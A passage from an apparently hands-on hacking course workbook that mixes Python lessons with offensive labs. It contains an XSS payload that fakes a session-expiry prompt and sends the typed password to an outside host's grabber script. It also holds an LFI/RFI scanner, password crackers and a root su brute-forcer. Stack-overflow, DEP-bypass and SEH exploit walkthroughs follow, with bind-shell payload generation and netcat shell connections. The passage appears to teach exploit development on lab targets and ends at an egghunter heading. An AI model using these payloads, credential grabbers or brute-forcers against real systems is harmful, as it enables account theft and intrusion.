3296. Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
3297.  
3298.  
3299. Use Firefox to browse to the following location:
3300. ---------------------------Type This-----------------------------------
3301.  
3302.    http://45.63.104.73/xss_practice/
3303. -----------------------------------------------------------------------
3304.  
3305.  
3306.  
3307. Paste this in the search box
3308. ----------------------------
3309.  
3310.  
3311. ---------------------------Type This-----------------------------------
3312.  
3313. <script>
3314. password=prompt('Your session is expired. Please enter your password to continue',' ');
3315. document.write("<img src=\"http://45.63.104.73/xss_practice/passwordgrabber.php?password=" +password+"\">");
3316. </script>
3317. -----------------------------------------------------------------------
3318.  
3319.  
3320. Now view the stolen cookie at:
3321. ---------------------------Type This-----------------------------------
3322.  
3323.    http://45.63.104.73/xss_practice/passwords.html
3324.  
3325. -----------------------------------------------------------------------
3326.  
3327.  
3328.  
3329.  
3330. #################################################
3331. # Lesson 25: Python Functions & String Handling #
3332. #################################################
3333.  
3334. Python can make use of functions:
3335. http://www.tutorialspoint.com/python/python_functions.htm
3336.  
3337.  
3338.  
3339. Python can interact with the 'crypt' function used to create Unix passwords:
3340. http://docs.python.org/2/library/crypt.html
3341.  
3342.  
3343.  
3344. Tonight we will see a lot of the split() method so be sure to keep the following references close by:
3345. http://www.tutorialspoint.com/python/string_split.htm
3346.  
3347.  
3348. Tonight we will see a lot of slicing so be sure to keep the following references close by:
3349. http://techearth.net/python/index.php5?title=Python:Basics:Slices
3350.  
3351.  
3352. ---------------------------Type This-----------------------------------
3353. vi LFI-RFI.py
3354.  
3355.  
3356. ---------------------------Paste This-----------------------------------
3357.  
3358.  
3359.  
3360. #!/usr/bin/env python
3361. print("\n### PHP LFI/RFI Detector ###")
3362.  
3363. import urllib.request, urllib.error, urllib.parse,re,sys
3364.  
3365. TARGET = "http://45.63.104.73/showfile.php?filename=about.txt"
3366. RFIVULN = "https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt?"
3367. TravLimit = 12
3368.  
3369. print("==> Testing for LFI vulns..")
3370. TARGET = TARGET.split("=")[0]+"=" ## URL MANUPLIATION
3371. for x in range(1,TravLimit): ## ITERATE THROUGH THE LOOP
3372.    TARGET += "../"
3373.    try:
3374.        source = urllib.request.urlopen((TARGET+"etc/passwd")).read().decode() ## WEB REQUEST
3375.    except urllib.error.URLError as e:
3376.        print("$$$ We had an Error:",e)
3377.        sys.exit(0)
3378.    if re.search("root:x:0:0:",source): ## SEARCH FOR TEXT IN SOURCE
3379.        print("!! ==> LFI Found:",TARGET+"etc/passwd")
3380.        break ## BREAK LOOP WHEN VULN FOUND
3381.  
3382. print("\n==> Testing for RFI vulns..")
3383. TARGET = TARGET.split("=")[0]+"="+RFIVULN ## URL MANUPLIATION
3384. try:
3385.    source = urllib.request.urlopen(TARGET).read().decode() ## WEB REQUEST
3386. except urllib.error.URLError as e:
3387.    print("$$$ We had an Error:",e)
3388.    sys.exit(0)
3389. if re.search("Hello world",source): ## SEARCH FOR TEXT IN SOURCE
3390.    print("!! => RFI Found:",TARGET)
3391.    
3392. print("\nScan Complete\n") ## DONE
3393.  
3394.  
3395.  
3396.  
3397. -----------------------------------------------------------------------
3398.  
3399.  
3400. -----------------------------------------------------------------------
3401.  
3402.  
3403. ################################
3404. # Lesson 26: Password Cracking #
3405. ################################
3406.  
3407. ---------------------------Type This-----------------------------------
3408.  
3409. wget http://45.63.104.73/htcrack.py
3410.  
3411. vi htcrack.py
3412.  
3413.  
3414. ---------------------------Paste This-----------------------------------
3415. #!/usr/bin/env python
3416.  
3417. import crypt, sys
3418.  
3419. if len(sys.argv) != 3:
3420.     print("Usage: ./htcrack.py <password> <wordlist>")
3421.     print("ex: ./htcrack.py user:62P1DYLgPe5S6 [path to wordlist]");
3422.     sys.exit(1)
3423.    
3424. pw = sys.argv[1].split(":",1)
3425. try:
3426.  words = open(sys.argv[2], "r")
3427. except(IOError):
3428.  print("Error: Check your wordlist path\n")
3429.  sys.exit(1)
3430. wds = words.readlines()
3431. print("\n-d3hydr8[at]gmail[dot]com htcrack v[1.0]-")
3432. print("     - http://darkcode.ath.cx -")
3433. print("\n",len(wds),"words loaded...")
3434. for w in wds:
3435.     if crypt.crypt(w[:-1], pw[1][:2]) == pw[1]:
3436.         print("\nCracked:",pw[0]+":"+w,"\n")
3437.  
3438.  
3439. ---------------------------Type This-----------------------------------
3440. vi list.txt
3441.  
3442. ---------------------------Paste This-----------------------------------
3443.  
3444. hello
3445. goodbye
3446. red
3447. blue
3448. yourname
3449. tim
3450. bob
3451.  
3452. -----------------------------------------------------------------------
3453.  
3454. ---------------------------Type This-----------------------------------
3455.  
3456. htpasswd -nd yourname
3457.     - enter yourname as the password
3458.  
3459.  
3460.  
3461. python htcrack.py joe:7XsJIbCFzqg/o list.txt
3462.  
3463.  
3464.  
3465.  
3466. sudo apt-get install -y python-mechanize python-pexpect python-pexpect-doc
3467.  
3468. rm -rf mechanize-0.2.5.tar.gz
3469.  
3470. sudo /bin/bash
3471.  
3472. passwd
3473.     ***set root password***
3474.  
3475.  
3476.  
3477. ---------------------------Type This-----------------------------------
3478.  
3479. vi rootbrute.py
3480.  
3481. ---------------------------Paste This-----------------------------------
3482.  
3483.  
3484. #!/usr/bin/env python
3485.  
3486. import sys
3487. try:
3488.        import pexpect
3489. except(ImportError):
3490.        print("\nYou need the pexpect module.")
3491.        print("http://www.noah.org/wiki/Pexpect\n")
3492.        sys.exit(1)
3493.  
3494. #Change this if needed.
3495. # LOGIN_ERROR = 'su: incorrect password'
3496. LOGIN_ERROR = "su: Authentication failure"
3497.  
3498. def brute(word):
3499.        print("Trying:",word)
3500.        child = pexpect.spawn('/bin/su')
3501.        child.expect('Password: ')
3502.        child.sendline(word)
3503.        i = child.expect (['.+\s#\s',LOGIN_ERROR, pexpect.TIMEOUT],timeout=3)
3504.        if i == 1:
3505.                print("Incorrect Password")
3506.  
3507.        if i == 2:
3508.                print("\n\t[!] Root Password:" ,word)
3509.                child.sendline ('id')
3510.                print(child.before)
3511.                child.interact()
3512.  
3513. if len(sys.argv) != 2:
3514.        print("\nUsage : ./rootbrute.py <wordlist>")
3515.        print("Eg: ./rootbrute.py words.txt\n")
3516.        sys.exit(1)
3517.  
3518. try:
3519.        words = open(sys.argv[1], "r").readlines()
3520. except(IOError):
3521.        print("\nError: Check your wordlist path\n")
3522.        sys.exit(1)
3523.  
3524. print("\n[+] Loaded:",len(words),"words")
3525. print("[+] BruteForcing...\n")
3526. for word in words:
3527.        brute(word.replace("\n",""))
3528.  
3529.  
3530. -----------------------------------------------------------------------
3531.  
3532.  
3533. References you might find helpful:
3534. http://stackoverflow.com/questions/15026536/looping-over-a-some-ips-from-a-file-in-python
3535.  
3536.  
3537.  
3538.  
3539.  
3540.  
3541.  
3542. ---------------------------Type This-----------------------------------
3543. it does not work in python 3 we must change the module
3544.  
3545. wget http://45.63.104.73/md5crack.py
3546.  
3547. vi md5crack.py
3548.  
3549. #!/usr/bin/env python
3550.  
3551. import md5hash, base64, sys
3552.  
3553. if len(sys.argv) != 3:
3554.     print("Usage: ./md5crack.py <hash> <wordlist>")
3555.     sys.exit(1)
3556.    
3557. pw = sys.argv[1]
3558. wordlist = sys.argv[2]
3559. try:
3560.  words = open(wordlist, "r")
3561. except(IOError):
3562.  print("Error: Check your wordlist path\n")
3563.  sys.exit(1)
3564. words = words.readlines()
3565. print("\n",len(words),"words loaded...")
3566. hashes = {}
3567. for word in words:
3568.     hash = md5.new()
3569.     hash.update(word[:-1])
3570.     value = hash.hexdigest()
3571.     hashes[word[:-1]] = value
3572. for (key, value) in list(hashes.items()):
3573.     if pw == value:
3574.         print("Password is:",key,"\n")
3575.  
3576. -----------------------------------------------------------------------
3577.  
3578.  
3579.  
3580.  
3581. Why use hexdigest
3582. http://stackoverflow.com/questions/3583265/compare-result-from-hexdigest-to-a-string
3583.  
3584.  
3585.  
3586.  
3587. http://md5online.net/
3588.  
3589.  
3590.  
3591. ---------------------------Type This-----------------------------------
3592.  
3593.  
3594. wget http://45.63.104.73/wpbruteforcer.py
3595.  
3596.  
3597. -----------------------------------------------------------------------
3598.  
3599.  
3600.  
3601. #############
3602. # Functions #
3603. #############
3604.  
3605.  
3606. ***********************
3607. * What are Functions? *
3608. ***********************
3609.  
3610.  
3611. Functions are a convenient way to divide your code into useful blocks, allowing us to order our code, make it more readable, reuse it and save some time. Also functions are a key way to define interfaces so programmers can share their code.
3612.  
3613. How do you write functions in Python?
3614.  
3615. Python makes use of blocks.
3616.  
3617. A block is a area of code of written in the format of:
3618.  
3619. block_head:
3620.    
3621.      1st block line
3622.    
3623.      2nd block line
3624.    
3625.      ...
3626.  
3627.  
3628. Where a block line is more Python code (even another block), and the block head is of the following format: block_keyword block_name(argument1,argument2, ...) Block keywords you already know are "if", "for", and "while".
3629.  
3630. Functions in python are defined using the block keyword "def", followed with the function's name as the block's name. For example:
3631.  
3632. def my_function():
3633.    print("Hello From My Function!")
3634.  
3635.  
3636. Functions may also receive arguments (variables passed from the caller to the function). For example:
3637.  
3638. def my_function_with_args(username, greeting):
3639.    print("Hello, %s , From My Function!, I wish you %s"%(username, greeting))
3640.  
3641.  
3642. Functions may return a value to the caller, using the keyword- 'return' . For example:
3643.  
3644. def sum_two_numbers(a, b):
3645.    return a + b
3646.  
3647.  
3648. ****************************************
3649. * How do you call functions in Python? *
3650. ****************************************
3651.  
3652. Simply write the function's name followed by (), placing any required arguments within the brackets. For example, lets call the functions written above (in the previous example):
3653.  
3654. # Define our 3 functions
3655. ---------------------------Paste This-----------------------------------
3656.  
3657. def my_function():
3658.    print("Hello From My Function!")
3659.  
3660. def my_function_with_args(username, greeting):
3661.    print("Hello, %s , From My Function!, I wish you %s"%(username, greeting))
3662.  
3663. def sum_two_numbers(a, b):
3664.    return a + b
3665.  
3666. # print(a simple greeting)
3667. my_function()
3668.  
3669. #prints - "Hello, Joe, From My Function!, I wish you a great year!"
3670. my_function_with_args("Joe", "a great year!")
3671.  
3672. # after this line x will hold the value 3!
3673. x = sum_two_numbers(1,2)
3674. -----------------------------------------------------------------------
3675.  
3676.  
3677. ************
3678. * Exercise *
3679. ************
3680.  
3681. In this exercise you'll use an existing function, and while adding your own to create a fully functional program.
3682.  
3683. Add a function named list_benefits() that returns the following list of strings: "More organized code", "More readable code", "Easier code reuse", "Allowing programmers to share and connect code together"
3684.  
3685. Add a function named build_sentence(info) which receives a single argument containing a string and returns a sentence starting with the given string and ending with the string " is a benefit of functions!"
3686.  
3687. Run and see all the functions work together!
3688.  
3689.  
3690. ---------------------------Paste This-----------------------------------
3691.  
3692. # Modify this function to return a list of strings as defined above
3693. def list_benefits():
3694.    pass
3695.  
3696. # Modify this function to concatenate to each benefit - " is a benefit of functions!"
3697. def build_sentence(benefit):
3698.    pass
3699.  
3700. def name_the_benefits_of_functions():
3701.    list_of_benefits = list_benefits()
3702.    for benefit in list_of_benefits:
3703.        print(build_sentence(benefit))
3704.  
3705. name_the_benefits_of_functions()
3706.  
3707.  
3708. -----------------------------------------------------------------------
3709.  
3710.  
3711.  
3712. Broken link
3713.  
3714. Please download this file to your Windows host machine, and extract it to your Desktop.
3715. http://45.63.104.73/ED-Workshop-Files.zip
3716.  
3717.  
3718.  
3719.  
3720.  
3721. ###########################
3722. # Lab 1a: Stack Overflows #
3723. ###########################
3724.  
3725.    #############################
3726.    # Start WarFTPd             #
3727.    # Start WinDBG              #
3728.    # Press F6                  #
3729.    # Attach to war-ftpd.exe    #
3730.    #############################
3731. ---------------------------Type This-----------------------------------
3732.  
3733. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1a
3734.  
3735.  
3736. python warftpd1.py | nc XPSP3-ED-Target-IP 21
3737.  
3738.  
3739.    At WINDBG prompt
3740.    “r” to show registers or “alt+4”
3741.    dd esp
3742.  
3743. -----------------------------------------------------------------------
3744. ---------------------------Type This-----------------------------------
3745.  
3746. python warftpd2.py | nc XPSP3-ED-Target-IP 21
3747.  
3748.  
3749.    At WINDBG prompt
3750.    “r” to show registers or “alt+4”
3751.    dd esp
3752. -----------------------------------------------------------------------
3753.  
3754.    Eip: 32714131
3755.    esp: affd58     (71413471)
3756.  
3757.    Now we need to SSH into the StrategicSec Ubuntu host
3758. ---------------------------Type This-----------------------------------
3759.  
3760.    cd /home/strategicsec/toolz/metasploit/tools/exploit
3761.  
3762.    ruby pattern_offset.rb 32714131
3763.    485
3764.  
3765.    ruby pattern_offset.rb 71413471
3766.    493
3767. -----------------------------------------------------------------------
3768.  
3769.    Distance to EIP is:         485
3770.    Relative position of ESP is:    493
3771.  
3772.    RET – POP EIP
3773.    RET 4 – POP EIP and shift ESP down by 4 bytes
3774.  ---------------------------Type This-----------------------------------
3775.  
3776.    cd /home/strategicsec/toolz/metasploit/
3777.    ./msfpescan -j ESP DLLs/xpsp3/shell32.dll
3778. -----------------------------------------------------------------------
3779.  
3780.        0x7c9c167d push esp; retn 0x304d
3781.        0x7c9d30d7 jmp esp < - how about we use this one
3782.        0x7c9d30eb jmp esp
3783.        0x7c9d30ff jmp esp
3784.  
3785.  
3786.        warftpd3.py with Notepad++
3787.        Fill in the appropriate values
3788.        Distance to EIP
3789.        Address of JMP ESP
3790.  
3791.  
3792.  ---------------------------Type This-----------------------------------
3793.  
3794. python warftpd3.py | nc XPSP3-ED-Target-IP 21
3795.  
3796.    0:003> dd eip
3797.    0:003> dd esp
3798.  
3799. -----------------------------------------------------------------------
3800.  
3801.  
3802.  
3803.  
3804.    Mention bad characters
3805.    No debugger
3806.  
3807.  ---------------------------Type This-----------------------------------
3808.  
3809.  
3810. python warftpd4.py | nc XPSP3-ED-Target-IP 21
3811.  
3812. nc XPSP3-ED-Target-IP 4444
3813.  
3814.  -----------------------------------------------------------------------
3815.  
3816.  
3817.  
3818.  
3819. There are 2 things that can go wrong with shellcode. The first thing is a lack of space, and the second is bad characters.
3820.  
3821. Shellcode test 1: Calculate space for shellcode
3822. Look in the warftpd3.py script for the shellcode variable. Change the length of the shellcode being send to test how much you can send before the CCs truncate.
3823.  
3824.  
3825.  
3826.  
3827.  
3828. Shellcode test 2: Identify bad characters
3829.  
3830. Replace the INT3 (cc) dummy shellcode with this string:
3831.  ---------------------------Type This-----------------------------------
3832.  
3833. "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
3834.  
3835.  -----------------------------------------------------------------------
3836.  
3837. Send this new shellcode string and identify the places where it truncates - these are the bad characters
3838.  
3839.  
3840.  
3841.  
3842. Here is what the string looks like after I manually tested and removed each of the bad characters:
3843.  ---------------------------Type This-----------------------------------
3844.  
3845. shellcode = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
3846.  
3847.  -----------------------------------------------------------------------
3848.  
3849.  
3850.   ---------------------------Type This-----------------------------------
3851.  
3852. ./msfvenom -p windows/shell/bind_tcp -f python -b '\x00\x0a\x0d\x40'
3853.  
3854.   -----------------------------------------------------------------------
3855.  
3856.  
3857.  
3858.  
3859. ###########################################
3860. # Lab 1b: Stack Overflows with DEP Bypass #
3861. ###########################################
3862.  
3863. Reboot your target host and choose the "2nd" option for DEP.
3864.  
3865.   ---------------------------Type This-----------------------------------
3866.  
3867. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1b
3868.  
3869.  
3870.  
3871.  
3872. python warftpd1.py | nc XPSP3-ED-Target-IP 21
3873.  
3874.    At WINDBG prompt
3875.    “r” to show registers or “alt+4”
3876.  
3877.    dd esp
3878.  
3879.   -----------------------------------------------------------------------
3880.  
3881.   ---------------------------Type This-----------------------------------
3882.  
3883. python warftpd2.py | nc XPSP3-ED-Target-IP 21
3884.  
3885.  
3886.    At WINDBG prompt
3887.    “r” to show registers or “alt+4”
3888.    dd esp
3889.   -----------------------------------------------------------------------
3890.  
3891.    Eip: 32714131
3892.    esp: affd58     (71413471)
3893.  
3894.    Now we need to SSH into the StrategicSec Ubuntu host
3895.    ---------------------------Type This-----------------------------------
3896.  
3897.    cd /home/strategicsec/toolz/metasploit/tools/exploit
3898.  
3899.    ruby pattern_offset.rb 32714131
3900.    485
3901.  
3902.    ruby pattern_offset.rb 71413471
3903.    493
3904.  
3905.  
3906.  
3907.  
3908.  
3909.  
3910.  
3911.  
3912. cd /home/strategicsec/toolz/metasploit/tools/exploit
3913.  
3914. ruby pattern_offset.rb 32714131
3915.  
3916. cd /home/strategicsec/toolz/metasploit/
3917.  
3918. ./msfpescan -j ESP DLLs/xpsp3/shell32.dll | grep 0x7c9d30d7
3919.  
3920.  
3921.  
3922. python warftpd3.py | nc XPSP3-ED-Target-IP 21
3923.  
3924.    0:003> dd eip
3925.    0:003> dd esp
3926. -----------------------------------------------------------------------
3927.  
3928. INT3s - GOOD!!!!!!!
3929.  
3930. ---------------------------Type This-----------------------------------
3931.  
3932.  
3933. python warftpd4.py | nc XPSP3-ED-Target-IP 21
3934.  
3935. nc XPSP3-ED-Target-IP 4444
3936. -----------------------------------------------------------------------
3937.  
3938.  
3939. strategicsec....exploit no workie!!!!
3940.  
3941.  
3942. Why????????? DEP!!!!!!!!!!!!!
3943.  
3944.  
3945.  
3946.  
3947. Let's look through ole32.dll for the following instructions:
3948.  
3949. mov al,0x1
3950. ret 0x4
3951.  
3952. We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.
3953.  
3954.  
3955. ---------------------------Type This-----------------------------------
3956.  
3957. ./msfpescan -D -r "\xB0\x01\xC2\x04" DLLs/xpsp3/ole32.dll
3958. -----------------------------------------------------------------------
3959.  
3960. [DLLs/xpsp3/ole32.dll]
3961. 0x775ee00e b001c204
3962. 0x775ee00e      mov al, 1
3963. 0x775ee010      ret 4
3964.  
3965.  
3966. Then we need to jump to the LdrpCheckNXCompatibility routine in
3967. ntdll.dll that disables DEP.
3968.  
3969.  
3970.  
3971. Inside of ntdll.dll we need to find the following instructions:
3972.  
3973. CMP AL,1
3974. PUSH 2
3975. POP ESI
3976. JE ntdll.7
3977.  
3978. ---------------------------Type This-----------------------------------
3979.  
3980.  
3981. ./msfpescan -D -r "\x3C\x01\x6A\x02\x5E\x0F\x84" DLLs/xpsp3/ntdll.dll
3982. -----------------------------------------------------------------------
3983.  
3984. [DLLs/xpsp3/ntdll.dll]
3985. 0x7c91cd24 3c016a025e0f84
3986. 0x7c91cd24      cmp al, 1
3987. 0x7c91cd26      push 2
3988. 0x7c91cd28      pop esi
3989. 0x7c91cd29      jz 7
3990.  
3991.  
3992. This set of instructions makes sure that AL is set to 1, 2 is pushed
3993. on the stack then popped into ESI.
3994.  
3995.  
3996.  
3997. ---------------------------Paste This-----------------------------------
3998.  
3999.  
4000. dep = "\x0e\xe0\x5e\x77"+\
4001. "\xff\xff\xff\xff"+\
4002. "\x24\xcd\x91\x7c"+\
4003. "\xff\xff\xff\xff"+\
4004. "A"*0x54
4005.  
4006. -----------------------------------------------------------------------
4007.  
4008.  
4009.    #############################
4010.    # Start WarFTPd             #
4011.    # Start WinDBG              #
4012.    # Press F6                  #
4013.    # Attach to war-ftpd.exe    #
4014.    # bp 0x775ee00e             #
4015.    # g                         #
4016.    #############################
4017.  
4018.  
4019. ---------------------------Type This-----------------------------------
4020.  
4021.  
4022. python warftpd5.py | nc XPSP3-ED-Target-IP 21
4023.  
4024. -----------------------------------------------------------------------
4025. We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.
4026.  
4027.    mov al,0x1
4028.    ret 0x4
4029.  
4030.  
4031.  
4032.  
4033. 0:005> g
4034. Breakpoint 0 hit
4035. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
4036. eip=775ee00e esp=00affd58 ebp=00affdb0 iopl=0         nv up ei pl nz ac pe nc
4037. cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
4038. ole32!CSSMappedStream::IsWriteable:
4039. 775ee00e b001            mov     al,1
4040.  
4041.  
4042. 0:001> t
4043. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
4044. eip=775ee010 esp=00affd58 ebp=00affdb0 iopl=0         nv up ei pl nz ac pe nc
4045. cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
4046. ole32!CSSMappedStream::IsWriteable+0x2:
4047. 775ee010 c20400          ret     4
4048.  
4049.  
4050.  
4051.  
4052.  
4053. ---------------------------------------------------------------------------
4054. Ok, so inside of ntdll.dll we need to find the following instructions:
4055.  
4056.    CMP AL,1
4057.    PUSH 2
4058.    POP ESI
4059.    JE ntdll.7
4060.  
4061. 0:001> t
4062. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
4063. eip=7c91cd24 esp=00affd60 ebp=00affdb0 iopl=0         nv up ei pl nz ac pe nc
4064. cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
4065. ntdll!LdrpCheckNXCompatibility+0x13:
4066. 7c91cd24 3c01            cmp     al,1
4067.  
4068.  
4069. 0:001> t
4070. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
4071. eip=7c91cd26 esp=00affd60 ebp=00affdb0 iopl=0         nv up ei pl zr na pe nc
4072. cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
4073. ntdll!LdrpCheckNXCompatibility+0x15:
4074. 7c91cd26 6a02            push    2
4075.  
4076.  
4077. 0:001> t
4078. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
4079. eip=7c91cd28 esp=00affd5c ebp=00affdb0 iopl=0         nv up ei pl zr na pe nc
4080. cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
4081. ntdll!LdrpCheckNXCompatibility+0x17:
4082. 7c91cd28 5e              pop     esi
4083.  
4084.  
4085. 0:001> t
4086. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=00000002 edi=00affe58
4087. eip=7c91cd29 esp=00affd60 ebp=00affdb0 iopl=0         nv up ei pl zr na pe nc
4088. cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
4089. ntdll!LdrpCheckNXCompatibility+0x18:
4090. 7c91cd29 0f84df290200    je      ntdll!LdrpCheckNXCompatibility+0x1a (7c93f70e) [br=1]
4091.  
4092.  
4093. ---------------------------------------------------------------------------
4094.  
4095.  
4096. ---------------------------Type This-----------------------------------
4097.  
4098. python warftpd5.py | nc XPSP3-ED-Target-IP 21
4099.  
4100. nc XPSP3-ED-Target-IP 4444
4101.  
4102. -----------------------------------------------------------------------
4103.  
4104. ##########################
4105. # Lab 1c: SEH Overwrites #
4106. ##########################
4107.  
4108.    #################################################
4109.    # On our VictimXP Host (XPSP3-ED-Target-IP)     #
4110.    # Start sipXexPhone if it isn’t already running #
4111.    # Start WinDBG                                  #
4112.    # Press “F6” and Attach to sipXexPhone.exe      #
4113.    # Press “F5” to start the debugger              #
4114.    #################################################
4115.  
4116. ---------------------------Type This-----------------------------------
4117.  
4118. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1c\sipx_complete
4119.  
4120.  
4121.  
4122. python sipex0.py XPSP3-ED-Target-IP
4123.  
4124.    0:003> !exchain
4125.    0:003> dds esp
4126.    0:003> dds
4127.  
4128. python sipex1.py XPSP3-ED-Target-IP
4129.  
4130.    0:003> !exchain
4131.    0:003> g
4132.  
4133.    When looking at !exchain you should see that EIP is 41414141, so let’s add more characters.
4134.  
4135.  
4136. python sipex2.py XPSP3-ED-Target-IP
4137.  
4138.    0:003> !exchain
4139.    0:003> g
4140.  
4141.  
4142.    ***ssh into instructor Ubuntu host***
4143.    cd /home/strategicsec/toolz/metasploit/tools/exploit
4144.    ruby pattern_offset.rb 41346941             We should see that SEH is at 252
4145.  
4146.  
4147.  
4148.    !load narly
4149.    !nmod
4150.  
4151.    ***ssh into the Ubuntu host***
4152.    ls /home/strategicsec/toolz/metasploit/DLLs/xpsp3/sipXDLLs/
4153.    cd /home/strategicsec/toolz/metasploit/
4154.    ./msfpescan -p DLLs/xpsp3/sipXDLLs/sipxtapi.dll
4155.  
4156.  -----------------------------------------------------------------------
4157.  
4158.    #####################################
4159.    # sipex3.py in Notepad++.           #
4160.    # Set cseq = 252                    #
4161.    # Set seh2 address to: 0x10015977   #
4162.    #####################################
4163.  
4164. ---------------------------Type This-----------------------------------
4165.  
4166. python sipex3.py XPSP3-ED-Target-IP
4167.    0:003> !exchain
4168.  
4169. python sipex4.py XPSP3-ED-Target-IP
4170.  
4171.  
4172.  
4173. nc XPSP3-ED-Target-IP 4444
4174.  
4175. -----------------------------------------------------------------------
4176.  
4177.  
4178.  
4179.  
4180. Brush up on the basics of Structured Exception Handlers:
4181. http://www.securitytube.net/video/1406
4182. http://www.securitytube.net/video/1407
4183. http://www.securitytube.net/video/1408
4184.  
4185.  
4186.  
4187.  
4188.  
4189.  
4190. ########################################
4191. # Lab 2a: Not Enough Space (Egghunter) #
4192. ########################################
4193.  
4194. ---------------------------Type This-----------------------------------
4195.  
4196. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\sws_skeleton
4197. -----------------------------------------------------------------------
4198.  
4199. SWS - SIMPLE WEB SERVER
4200. -----------------------
4201.  
4202. Running SWS on Strategicsec-XP-ED-Target-VM
4203. Start > Programs > Simple Web Server (it's in the middle somewhere)
4204. Red icon in system tray
4205. Double click it
4206. - it will pop up a menu
4207. - select "start"
4208. - dialog box shows starting params - port 82
4209.  
4210. WinDBG
4211. - attach to "server.exe"
4212.  
4213. ---------------------------Type This-----------------------------------
4214.  
4215. python sws1.py | nc XPSP3-ED-Target-IP 82
4216.  
4217.  
4218.  
4219. python sws2.py | nc XPSP3-ED-Target-IP 82
4220.  
4221.  
4222. SSH into the Ubuntu host (user: strategicsec/pass: strategicsec)
4223. cd /home/strategicsec/toolz/metasploit/tools/exploit
4224. ruby pattern_offset.rb 41356841             <------- You should see that EIP is at 225
4225. ruby pattern_offset.rb 68413668             <------- You should see that ESP is at 229
4226.  
4227.  
4228. -----------------------------------------------------------------------
4229.  
4230.  
4231.  
4232.  
4233.  
4234.  
4235. EGGHUNTER:
4236. ----------
4237.  
